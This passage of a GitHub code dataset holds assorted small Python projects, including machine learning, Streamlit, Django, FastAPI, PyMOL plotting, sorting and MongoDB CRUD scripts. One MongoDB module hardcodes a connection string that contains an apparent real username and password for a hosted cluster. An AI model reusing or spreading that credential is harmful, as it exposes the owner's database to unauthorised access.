json.loads(s.recv(8192))\r\n s.close()\r\n return result\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n result = socket_client()\r\n print(result)\r\n\r\n","repo_name":"luopanyaxin/software","sub_path":"clienttask3.py","file_name":"clienttask3.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37952953805","text":"import sys\n\nimport numpy as np\n# from sklearn import preprocessing\n# from sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nimport joblib\n\n\nOUTS = 1\n\n\ndef logistic_regression(outs=OUTS):\n\t# 
Данные\n\n\tdataset = np.loadtxt('test.csv', delimiter=',', skiprows=1)\n\n\tprint(outs)\n\n\tx = dataset[:, :-outs]\n\ty = dataset[:, -outs:]\n\n\tprint(x, y)\n\n\t# Преобразование y\n\n\ty = [1 if row else 2 for row in y]\n\n\t# Стандартизация\n\n\t# x = preprocessing.normalize(x)\n\n\t# Рассчёт весов\n\n\t# sc = StandardScaler()\n\t# sc.fit(x)\n\t# x_std = sc.transform(x)\n\t# x_test_std = sc.transform(x_test)\n\tx_std = x\n\t# x_test_std = x_test\n\n\tmodel = LogisticRegression(C=1000.0, random_state=0)\n\tmodel.fit(x_std, y)\n\n\t#\n\n\treturn model\n\ndef test(outs, model):\n\tdataset = np.loadtxt('test.csv', delimiter=',', skiprows=1)\n\tx = dataset[:, outs:]\n\ty = dataset[:, :outs]\n\n\ty = [np.where(row == 1.)[0][0] for row in y]\n\tresult = [model.predict([row])[0] == y[num] for num, row in enumerate(x)]\n\n\treturn sum(result), len(result)\n\n\nif __name__ == '__main__':\n\t# outs = np.genfromtxt('categories.csv', delimiter=',').shape[0]\n\touts = 1\n\n\tmodel = logistic_regression(outs)\n\n\t# Сохранение модели\n\n\tjoblib.dump(model, 'model.txt')\n\t# print(model)\n\n\t# Тестирование\n\n\tansw_right, answ_all = test(outs, model)\n\tprint('Test: {}%'.format(answ_right * 100 // answ_all))","repo_name":"TensyTeam/CET-MIPT-Hack","sub_path":"re/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70888363131","text":"# streamlit\r\n\r\nimport streamlit as st\r\nimport pandas as pd\r\nimport json\r\nimport time\r\nimport pickle\r\nimport collections\r\nfrom rapidfuzz import fuzz\r\nfrom itertools import islice\r\n\r\n\r\nst.title(\"Search Engine\")\r\nst.write(\"\"\"For a given text query search the corpus of the provided documents and return the\r\nmost relevant document. Expose the module as API which takes a text input and returns\r\nthe most relevant document. API should also have a parameter to get top n relevant\r\ndocuments instead of just top 1. 
The dataset will contain 2 fields, text and a unique id,\r\nreturn both the fields along with the similarity score in the API response.\"\"\")\r\n\r\n@st.cache(allow_output_mutation=True)\r\ndef load_products():\r\n folder_path = \"C:\\\\Users\\\\apurnaik\\\\OneDrive - Deloitte (O365D)\\\\Commback\\\\Projects\\\\Apps\\\\SearchEngine\\\\\"\r\n return pickle.load(open(folder_path+'products.pkl',\"rb\"))\r\n\r\ndef take(numdocs, iterable):\r\n \"Return first n items of the iterable as a list\"\r\n return list(islice(iterable, numdocs))\r\n\r\ndef find_relevant_docs(searchtext, numdocs):\r\n d = {fuzz.QRatio(searchtext, item['text']):item for item in products}\r\n od = collections.OrderedDict(sorted(d.items(), reverse=True))\r\n res = take(numdocs, od.items())\r\n df = pd.DataFrame(res, columns = ['similarity_score', 'text'])\r\n df1 = df['text'].apply(lambda x: pd.Series(x))\r\n df1['similarity_score'] = df['similarity_score'].copy()\r\n return df1\r\n\r\nproducts = load_products()\r\nst.write('Corpus loaded, its length:', len(products))\r\n\r\nsearchtext = st.text_input('Please enter the search string','running shorts')\r\n# more than 5 characters\r\nif len(searchtext) < 5:\r\n st.error(\"You can't use less than 5 characters\")\r\nelse:\r\n pass\r\n\r\n# only alphabets and spaces\r\nif all(x.isalpha() or x.isspace() for x in searchtext):\r\n pass\r\nelse:\r\n st.error(\"Only alphabetical letters and spaces\")\r\n\r\nnumdocs = st.number_input('Please enter number of relevant documents to be returned', min_value=1, max_value=20)\r\n\r\nif st.checkbox('Return Results'):\r\n df1 = find_relevant_docs(searchtext , numdocs)\r\n df1.index += 1 \r\n st.write(df1)\r\n\r\n\r\n","repo_name":"ApurvaNaik/productSearchEngine","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36461625941","text":"# Реализовать проект «Операции с комплексными числами». 
Создайте класс «Комплексное число».\n# Реализуйте перегрузку методов сложения и умножения комплексных чисел.\n# Проверьте работу проекта.\n# Для этого создаёте экземпляры класса (комплексные числа), выполните сложение и умножение созданных экземпляров.\n# Проверьте корректность полученного результата.\n\nclass Complex:\n def __init__(self, complex1, complex2):\n self.c1 = complex1\n self.c2 = complex2\n\n def __add__(self, other):\n s1 = sum(self.c1) + sum(other.c1)\n s2 = sum(self.c2) + sum(other.c2)\n if s2 < 0:\n return f\"Результат сложения множеств: {s1}{s2}j\"\n else:\n return f\"Результат сложения множеств: {s1}+{s2}j\"\n\n def __mul__(self, other):\n a = self.c1[0]\n c = other.c1[0]\n b = self.c2[0]\n d = other.c2[0]\n if (a * d + b * c) < 0:\n return f\"Результат умножения множеств: {a * c - b * d}{a * d + b * c}j\"\n else:\n return f\"Результат умножения множеств: {a * c - b * d}+{a * d + b * c}j\"\n\n @classmethod\n def modify(cls, data):\n list_, list_i = [], []\n dataCop = data\n\n '''Собираю действительные числа'''\n if dataCop[0] == '-':\n dataCop = dataCop.lstrip(\"-\")\n if '-' in dataCop:\n c = dataCop[:dataCop.find(\"-\")]\n c = \"-\" + c\n elif '+' in dataCop:\n c = dataCop[:dataCop.find(\"+\")]\n else:\n c = '0'\n else:\n if '-' in dataCop:\n c = dataCop[:dataCop.find(\"-\")]\n elif '+' in dataCop:\n c = dataCop[:dataCop.find(\"+\")]\n else:\n c = '0'\n list_.append(int(c))\n\n '''Отделяю мнимое число от действительного'''\n if '-' in dataCop:\n d = dataCop[dataCop.find(\"-\"):].rstrip('j')\n elif '+' in dataCop:\n d = dataCop[dataCop.find(\"+\"):].rstrip('j')\n else:\n d = data[:data.find(\"j\")]\n if d == '-' or d == '+':\n d += '1'\n list_i.append(int(d))\n return cls(list_, list_i)\n\n\nc1 = Complex.modify('5+12j')\nc2 = Complex.modify('7-4j')\n\nprint(c1 + c2)\nprint(c1 * c2)\n","repo_name":"glagli/Python_Begin","sub_path":"lesson8/practice/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":2714,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39481928354","text":"from sympy import *\nimport numpy as np\nimport os\nimport argparse\nfrom numpy import sin, cos, exp, log, sqrt\nimport scipy.special as sp\nfrom matplotlib import colors\nfrom sympy.physics.hydrogen import R_nl\n \n#cell size\nxsize = 80.111\nysize = 80.111\nzsize = 80.111\n\n#arguments from terminal\nparser = argparse.ArgumentParser()\nparser.add_argument(\"representation\", type=str, help=\"Your desire representation: abs, real, img, field. 
When using real or img their counterpart will be missing sometimes (l = 3) in this cases you can use abs if m = 0 but for the other cases you need to create the real part rename the output file then create the imaginary part and in the pymol terminal type load outputname.pdb.\")\nparser.add_argument(\"l\", type=int, help=\"Angular quantum number between 0 and n-1.\")\nparser.add_argument(\"m\", type=int, help=\"Magnetic quantum number between -l and l.\")\nparser.add_argument(\"grid\", type=int, help=\"Resolution for new equations maximum is 300\")\nparser.add_argument(\"scale\", type=int, help=\"Factor that rescales the coordinates minimum 50\")\nargs = parser.parse_args()\n\n#main variables\nfactor = args.scale\nplot = args.representation\nl = args.l \nm = args.m \ngrid = args.grid\narea = grid*grid \nPHI, THETA = np.mgrid[0:2*np.pi:grid*1j, 0:np.pi:grid*1j]\ncontador1 = 0\n\n#plot the real part of the spherical harmonics\nif plot == 'real':\n\tR = sp.sph_harm(m, l, PHI, THETA).real\n\tx = factor*R*sin(THETA)*cos(PHI)\n\ty = factor*R*sin(THETA)*sin(PHI)\n\tz = factor*R*cos(THETA)\n\tcolor = R/R.max()\n\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n#plot the imaginary part of the spherical harmonics\nif plot == 'img':\n\tR = sp.sph_harm(m, l, PHI, THETA).imag\n\tx = factor*R*sin(THETA)*cos(PHI)\n\ty = factor*R*sin(THETA)*sin(PHI)\n\tz = factor*R*cos(THETA)\n\tcolor = R/R.max()\n\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n#plot the absolute value of the spherical harmonics\nif plot == 'abs':\n\tR = np.abs(sp.sph_harm(m, l, PHI, THETA))\n\tx = factor*R*sin(THETA)*cos(PHI)\n\ty = factor*R*sin(THETA)*sin(PHI)\n\tz = factor*R*cos(THETA)\n\tcolor = R/R.max()\n\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n#plot the real part of the spherical harmonics like a field\nif plot == 'field':\n\tR = sp.sph_harm(m, l, PHI, THETA).real\n\ts = 1\n\tx = factor*(s*R+1)*np.sin(THETA)*np.cos(PHI)\n\ty = factor*(s*R+1)*np.sin(THETA)*np.sin(PHI)\n\tz = factor*(s*R+1)*np.cos(THETA)\n\tcolor = R/R.max()\n\t#write information to be read by pymol\n\twith open('orbital.pdb', 'w') as f:\n\t f.write(\"TITLE 
Function\\n\")\n\t f.write(\"CRYST1 {} {} {} 90.00 90.00 90.00\\n\".format(xsize,ysize,zsize))\n\t for j in range(len(y)):\n\t contador1+=1\n\t contador2 = 1\n\t for i in range(len(x)):\n\t f.write('ATOM {:6d} C XXX A 1 {:07.3f} {:07.3f} {:07.3f} 1.00 {:03.2f}\\n'.format(area-contador1*grid+contador2,x[i][j],y[i][j],z[i][j],color[i][j]))\n\t contador2+=1\n\t f.write(\"END\")\n\n\tos.system('pymol showorbital.pml')\n\n","repo_name":"JAMelendezD/HowToPlot","sub_path":"pymol/orbitals.py","file_name":"orbitals.py","file_ext":"py","file_size_in_byte":4482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5773360810","text":"from epics import PV\nimport matplotlib.pyplot as plt\nimport time\n\ndef Start_monitor():\n TM_02 = PV(\"TM1504-1-02\")\n TM_06 = PV(\"TM1504-1-06\")\n PS_adc = PV(\"PS1504-01:adc\")\n out_temp = []\n in_temp = []\n adc_array = []\n x_axis = []\n fig = plt.figure()\n temp_plt = fig.add_subplot(211)\n adc_plt = fig.add_subplot(212)\n Ln1, = temp_plt.plot(out_temp) #not sure why ln1 must be an element of a list\n Ln2, = temp_plt.plot(in_temp)\n Ln3, = adc_plt.plot(adc_array)\n plt.ion()\n temp_plt.set_title(\"Water Temperature\")\n adc_plt.set_title(\"PS ADC\")\n temp_plt.legend([\"Out going H20 T\", \"Incoming H2O T\"], loc=\"upper left\")\n plt.xlabel('time (s)')\n temp_plt.set_ylabel('Temp (°C)')\n adc_plt.set_ylabel('ADC')\n temp_plt.grid(linewidth=1, linestyle='-')\n adc_plt.grid(linewidth=1, linestyle='-')\n i = 0\n start = time.time()\n while True:\n out = TM_02.get(as_numpy=True)\n income = TM_06.get(as_numpy=True)\n adc = PS_adc.get(as_numpy=True)\n out_temp.append(out)\n in_temp.append(income)\n adc_array.append(adc)\n\n x_axis.append(i)\n Ln1.set_ydata(out_temp)\n Ln2.set_ydata(in_temp)\n Ln3.set_ydata(adc_array)\n Ln1.set_xdata(x_axis)\n Ln2.set_xdata(x_axis)\n Ln3.set_xdata(x_axis)\n\n temp_miny = min(in_temp) - 2\n temp_maxy = max(out_temp) + 2\n temp_plt.set_xlim(0, i + 1)\n temp_plt.set_ylim(temp_miny, temp_maxy)\n\n adc_miny = min(adc_array) - 2\n adc_maxy = max(adc_array) + 2\n adc_plt.set_xlim(0, i + 1)\n adc_plt.set_ylim(adc_miny, adc_maxy)\n\n plt.pause(3.5) #Allows time for graph to update\n i += 5\n time.sleep(5 - ((time.time() - start) % 5))\n\nif __name__ == '__main__':\n Start_monitor()\n\n\n\n","repo_name":"dragoon7201/HP_calib","sub_path":"Temp_monitor.py","file_name":"Temp_monitor.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18054606789","text":"#https://en.wikipedia.org/wiki/Quicksort (issue with floor(lo+hi)/2) not working)\n#https://www.geeksforgeeks.org/hoares-vs-lomuto-partition-scheme-quicksort/ (Works)\nimport numpy as np\nimport time\nimport math\nimport sys\n\ndef quicksort_hoare(A, lo, hi):\n # print(f\"lo = {lo}, hi = {hi}\")\n if lo < hi:\n p = partition_hoare(A,lo,hi)\n # print(f\"partition = {p}\")\n quicksort_hoare(A,lo,p)\n quicksort_hoare(A, p+1, hi)\n\ndef partition_hoare(A, lo, hi):\n # print(\"***START ***\")\n pivot = A[lo] #A[math.floor(lo+hi/2)]\n # print(f\"Pivot: {pivot}\")\n i = lo -1\n j = hi + 1\n # print(f\"i = {i} and j = {j}\")\n while(True):\n i += 1\n while (A[i] < pivot):\n i += 1\n\n j -= 1\n while (A[j] > pivot):\n j -= 1\n\n if (i >= j):\n return j\n \n A[i], A[j] = A[j], A[i]\n\nsys.setrecursionlimit(10**6) \nsizes = [10,100,1000,10000,100000,1000000,10000000]\nfor k in sizes:\n A = np.random.randint(1,100,k)\n # print(f\"len(A) = 
{len(A)}\")\n start = time.perf_counter()\n quicksort_hoare(A, 0, len(A)-1) \n end = time.perf_counter()\n total = end-start\n print(f\"{k} {total}\")\n\n","repo_name":"pushkarv/sorting","sub_path":"quicksort/quicksort_hoare.py","file_name":"quicksort_hoare.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32642259029","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n # path('', views.index, name='index'),\n path('index/', views.memory_list, name='index'),\n path('memory/<int:pk>/', views.memory_detail, name='memory_detail'),\n path('klc/', views.klc, name='klc'),\n path('rjc/', views.rjc, name='rjc'),\n path('lac/', views.lac, name='lac'),\n]","repo_name":"coopcraft/memoryapp","sub_path":"corememapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43974201452","text":"from django.contrib.auth.decorators import permission_required\nfrom django.contrib.messages import SUCCESS, add_message\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.urls import reverse\nfrom django.utils.translation import gettext_lazy as _\n\nfrom itdagene.app.experiences.forms import ExperienceForm\nfrom itdagene.app.experiences.models import Experience\nfrom itdagene.core.decorators import staff_required\nfrom itdagene.core.models import Preference\n\n\n@staff_required()\ndef list(request):\n experience_lists = []\n for pref in Preference.objects.all().order_by(\"-year\"):\n experience_lists.append(\n (\n pref.year,\n Experience.objects.filter(year__year=pref.year).order_by(\"position\"),\n )\n )\n return render(\n request,\n \"experiences/list.html\",\n {\"experience_lists\": experience_lists, \"title\": _(\"Experiences\")},\n )\n\n\n@staff_required()\ndef view(request, id):\n experience = get_object_or_404(Experience, pk=id)\n return render(\n request,\n \"experiences/view.html\",\n {\n \"experience\": experience,\n \"title\": _(\"Experience\"),\n \"description\": str(experience) + \" \" + str(experience.year.year),\n },\n )\n\n\n@permission_required(\"experiences.add_experience\")\ndef add(request):\n form = ExperienceForm()\n if request.method == \"POST\":\n form = ExperienceForm(request.POST)\n if form.is_valid():\n data = form.save(commit=False)\n data.year = Preference.get_preference_by_year(request.user.year)\n data.save()\n add_message(request, SUCCESS, _(\"Experience added.\"))\n return redirect(reverse(\"itdagene.experiences.view\", args=[data.pk]))\n\n return render(\n request, \"experiences/form.html\", {\"form\": form, \"title\": _(\"Add Experience\")}\n )\n\n\n@permission_required(\"experiences.change_experience\")\ndef edit(request, id):\n es = get_object_or_404(Experience, pk=id)\n form = ExperienceForm(instance=es)\n if request.method == \"POST\":\n form = ExperienceForm(request.POST, instance=es)\n if form.is_valid():\n data = form.save()\n return redirect(reverse(\"itdagene.experiences.view\", args=[data.pk]))\n\n return render(\n request,\n \"experiences/form.html\",\n {\n \"form\": form,\n \"experience\": es,\n \"title\": _(\"Edit Experience\"),\n \"description\": str(es) + \" \" + str(es.year.year),\n },\n 
)\n","repo_name":"itdagene-ntnu/itdagene","sub_path":"itdagene/app/experiences/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"74751247611","text":"import os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport time\n\nfrom torchvision import datasets, transforms\nfrom torch.utils.data import DataLoader\n\nfrom network.network import SimpleNN\n\ndef main():\n transform = transforms.Compose([transforms.ToTensor()])\n\n train_dataset = datasets.MNIST(\n root=\"./mnist_data\", train=True, transform=transform, download=True\n )\n\n eval_dataset = datasets.MNIST(\n root=\"./mnist_data\", train=False, transform=transform, download=True\n )\n\n model = SimpleNN(784, 100, 10)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(model.parameters(), lr=0.001)\n\n train_loader = DataLoader(train_dataset, batch_size=100, shuffle=True)\n eval_loader = DataLoader(eval_dataset, batch_size=100, shuffle=False)\n\n for _ in range(10):\n for images, labels in train_loader:\n outputs = model(images.view(-1, 784))\n loss = criterion(outputs, labels)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n correct = 0\n total = 0\n with torch.no_grad():\n for images, labels in eval_loader:\n outputs = model(images.view(-1, 784))\n _, predicted = torch.max(outputs.data, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum()\n\n print(\"Accuracy: {}\".format(100 * correct / total))\n\n #torch.save(model.state_dict(), \"./model.pth\")\n\n \n\n\nif __name__ == \"__main__\":\n main()","repo_name":"LinneaBodin01/mnist","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2882374770","text":"from django import forms\nfrom ShowGraph.models import Files,Product\n\nimport csv\nimport codecs\nfrom decimal import Decimal\nimport functools\n\nclass FormUploadFile(forms.Form):\n \n file = forms.FileField(label='Файл:')\n \n def load(self,user):\n file = csv.reader(codecs.iterdecode(self.cleaned_data.get('file').open(), 'utf-8-sig'),delimiter=';')\n header = next(file)\n \n if header==['client', 'tps', 'latency', 'stddev']:\n files = Files.objects.create(user=user,doc_name=self.cleaned_data.get('file').name,\n status=0)\n \n bulk_list = []\n \n for el in file:\n bulk_list.append(Product(files=files,\n client=Decimal(el[0].replace(\",\",\".\")),\n tps=Decimal(el[1].replace(\",\",\".\")),\n latency=Decimal(el[2].replace(\",\",\".\")),\n stddev=Decimal(el[3].replace(\",\",\".\")),))\n \n files.save()\n \n Product.objects.bulk_create(bulk_list)\n return files.id\n else:\n return False","repo_name":"Datrim2/TestTask","sub_path":"TestTask/ShowGraph/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32976580167","text":"import pytest\nfrom typing import Annotated\n\nimport sqlalchemy as sa\nfrom fastapi import Header\nfrom fastapi.testclient import TestClient\nfrom fastapi_pagination import add_pagination\nfrom sqlalchemy.orm import sessionmaker\n\nfrom optipy.config.settings import Settings\nfrom optipy.api.deps import get_auth_token_sub, get_db\nfrom optipy.db.base import Base\n\nfrom main import 
app\n\nsettings = Settings(_env_file=\".env.test\")\nengine = sa.create_engine(settings.SQLALCHEMY_DATABASE_URI)\nTestingSessionLocal = sessionmaker(\n autocommit=False,\n autoflush=False,\n bind=engine,\n)\n\n# Set up the database once\nBase.metadata.drop_all(bind=engine)\nBase.metadata.create_all(bind=engine)\n\n\n# These two event listeners are only needed for sqlite for proper\n# SAVEPOINT / nested transaction support. Other databases like postgres\n# don't need them.\n# From: https://docs.sqlalchemy.org/en/14/dialects/sqlite.html#serializable-isolation-savepoints-transactional-ddl\n@sa.event.listens_for(engine, \"connect\")\ndef do_connect(dbapi_connection, connection_record):\n # disable pysqlite's emitting of the BEGIN statement entirely.\n # also stops it from emitting COMMIT before any DDL.\n dbapi_connection.isolation_level = None\n\n\n@sa.event.listens_for(engine, \"begin\")\ndef do_begin(conn):\n # emit our own BEGIN\n conn.exec_driver_sql(\"BEGIN\")\n\n\n# This fixture creates a nested transaction, recreates it when the\n# application code calls session.commit and rolls it back at the end.\n# Based on: https://docs.sqlalchemy.org/en/14/orm/session_transaction.html#joining-a-session-into-an-external-transaction-such-as-for-test-suites\n@pytest.fixture()\ndef session():\n connection = engine.connect()\n transaction = connection.begin()\n session = TestingSessionLocal(bind=connection)\n\n # Begin a nested transaction (using SAVEPOINT).\n nested = connection.begin_nested()\n\n # If the application code calls session.commit, it will end the nested\n # transaction. Need to start a new one when that happens.\n @sa.event.listens_for(session, \"after_transaction_end\")\n def end_savepoint(session, transaction):\n nonlocal nested\n if not nested.is_active:\n nested = connection.begin_nested()\n\n yield session\n\n # Rollback the overall transaction, restoring the state before the test ran.\n session.close()\n transaction.rollback()\n connection.close()\n\n\n# A fixture for the fastapi test client which depends on the\n# previous session fixture. Instead of creating a new session in the\n# dependency override, it uses the one provided by the session fixture.\n@pytest.fixture()\ndef client(session):\n def override_get_db():\n yield session\n\n def override_get_auth_token_sub(x_user: Annotated[str | None, Header()] = \"user_a\"):\n if x_user == \"user_a\":\n return \"mock_sub_user_a@clients\"\n\n if x_user == \"user_b\":\n return \"mock_sub_user_b@clients\"\n\n app.dependency_overrides[get_db] = override_get_db\n app.dependency_overrides[get_auth_token_sub] = override_get_auth_token_sub\n\n add_pagination(app)\n\n yield TestClient(app)\n\n del app.dependency_overrides[get_db]\n del app.dependency_overrides[get_auth_token_sub]\n","repo_name":"zigcccc/optipy","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18280954218","text":"#This program merges Dexter Industries' Raspberry Pi Google Vision API logo recognition code,\r\n# with original GTTS code. 
12/12/18\r\n#Ben Bland\r\n\r\n\r\nimport argparse\r\nimport base64\r\nimport picamera\r\nimport subprocess \r\nimport os\r\nimport sys\r\n\r\nfrom gtts import gTTS\r\nfrom googleapiclient import discovery\r\nfrom oauth2client.client import GoogleCredentials\r\n\r\n\r\n\r\n\r\ndef takephoto():\r\n camera = picamera.PiCamera()\r\n camera.capture('image.jpg')\r\n camera.close()\r\n\r\ndef main():\r\n takephoto() \r\n credentials = GoogleCredentials.get_application_default()\r\n service = discovery.build('vision', 'v1', credentials=credentials)\r\n\r\n\r\n\r\n with open('image.jpg', 'rb') as image:\r\n image_content = base64.b64encode(image.read())\r\n service_request = service.images().annotate(body={\r\n 'requests': [{\r\n 'image': {\r\n 'content': image_content.decode('UTF-8')\r\n },\r\n 'features': [{\r\n 'type': 'LOGO_DETECTION',\r\n 'maxResults': 1\r\n }]\r\n }]\r\n })\r\n response = service_request.execute()\r\n \r\n try:\r\n label = response['responses'][0]['logoAnnotations'][0]['description']\r\n except:\r\n label = \"No response.\"\r\n \r\n print (label)\r\n text = label \r\n speech=gTTS(text,'en','slow')\r\n speech.save(\"testfile.mp3\")\r\n\r\n #Calling a CL command to play the newly created file\r\n os.system (\"omxplayer /home/pi/GoogleVisionTutorials/testfile.mp3\")\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n ","repo_name":"benbland33/talking-pi","sub_path":"480logo.py","file_name":"480logo.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37007808860","text":"# Um gerenciador de leiaute define a organização do widgets dentro de um container\n\nfrom tkinter import *\n\njanela = Tk()\n\n#Criar Label\nlb = Label(janela, text = 'Hello World!')\n\n#Informa o lugar aonde será mostrado a Label\nlb.place(x =110, y = 120)\n\njanela.geometry('300x300+200+200')\n\njanela.mainloop()","repo_name":"djalmarodriguess/Tkinter","sub_path":"Tkinter/03 - Gerenciador de leiaute place .py","file_name":"03 - Gerenciador de leiaute place .py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70194635131","text":"\nimport pymongo\n\n\nclient = pymongo.MongoClient(\"mongodb+srv://LucasMedici:Lucci1203@nomedocluster.ip8jntw.mongodb.net/?retryWrites=true&w=majority\")\nmydb = client.MercadoLivre\n\n\n# Create\ndef vendedor_insert(nome, email, produtos,id_vendedor):\n global mydb\n mycol = mydb.vendedor\n mydict = {\"nome\": nome, \"email\": email, \"produtos\":[produtos], \"id_vendedor\":id_vendedor}\n x = mycol.insert_one(mydict)\n print(x.inserted_id)\n\n\n# Find by id\ndef vendedor_findQuery():\n global mydb\n mycol = mydb.vendedor\n myquery = {\"id_vendedor\": \"1\"}\n mydoc = mycol.find(myquery)\n for x in mydoc:\n print(x)\n\n\n\n# Find all\ndef vendedor_searchAll():\n global mydb\n mycol = mydb.vendedor\n mydoc = mycol.find().sort(\"nome\")\n for a in mydoc:\n print(a)\n\n# Delete\ndef vendedor_deleteOne(id_vendedor):\n global mydb\n mycol = mydb.vendedor\n myquery = {\"id_vendedor\":id_vendedor}\n mycol.delete_one(myquery)\n\n\n#Update\ndef vendedor_Update(id_vendedor,novo_produto):\n global mydb\n mycol = mydb.vendedor\n myquery = {\"id_vendedor\": id_vendedor}\n mydoc = mycol.find(myquery)\n for x in mydoc:\n x[\"produtos\"].append(novo_produto)\n produtos_salvos = x[\"produtos\"]\n novo_valores = {\"$set\": {\"produtos\": [produtos_salvos]}}\n\n\n mycol.update_one(myquery, 
novo_valores)\n\n\n","repo_name":"LucasMedici/CliCrudPythonMongo","sub_path":"crud_vendedor.py","file_name":"crud_vendedor.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9909824922","text":"import csv\nfrom io import StringIO\n\nimport pandas as pd\nimport xlsxwriter\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom django.utils.datastructures import MultiValueDictKeyError\nfrom django.views.generic import ListView\n\nfrom .forms import (BalanceSearchForm, BOMCreateForm, BOMSearchForm,\n BOMUpdateForm, EcusCreateForm, EcusSearchForm,\n EcusUpdateForm, StockCreateForm, StockSearchForm,\n StockUpdateForm)\nfrom .models import BOM, Balance, Ecus, Stock\n\n\nclass IOBListView(LoginRequiredMixin, ListView):\n model = Stock\n template_name = 'stocksmanagement/list_items.html'\n context_object_name = 'queryset'\n ordering = ['-date']\n paginate_by = 20\n query_set = None\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['form'] = StockSearchForm(self.request.GET)\n context['title'] = 'IOB'\n return context\n\n def get_queryset(self):\n self.query_set = Stock.objects.all().filter(client=self.request.user)\n description = self.request.GET.get('description', '')\n item_name = self.request.GET.get('item_name', '')\n export_to_csv = self.request.GET.get('export_to_CSV', False)\n if description:\n self.query_set = self.query_set.filter(\n description__icontains=description\n )\n if item_name:\n self.query_set = self.query_set.filter(\n item_name__icontains=item_name\n )\n if export_to_csv:\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"List of stock.csv\"'\n writer = csv.writer(response)\n writer.writerow(['description', 'ITEM NAME', 'QUANTITY'])\n for stock in self.query_set:\n writer.writerow(\n [stock.description, stock.item_name])\n return self.query_set\n\n\nclass 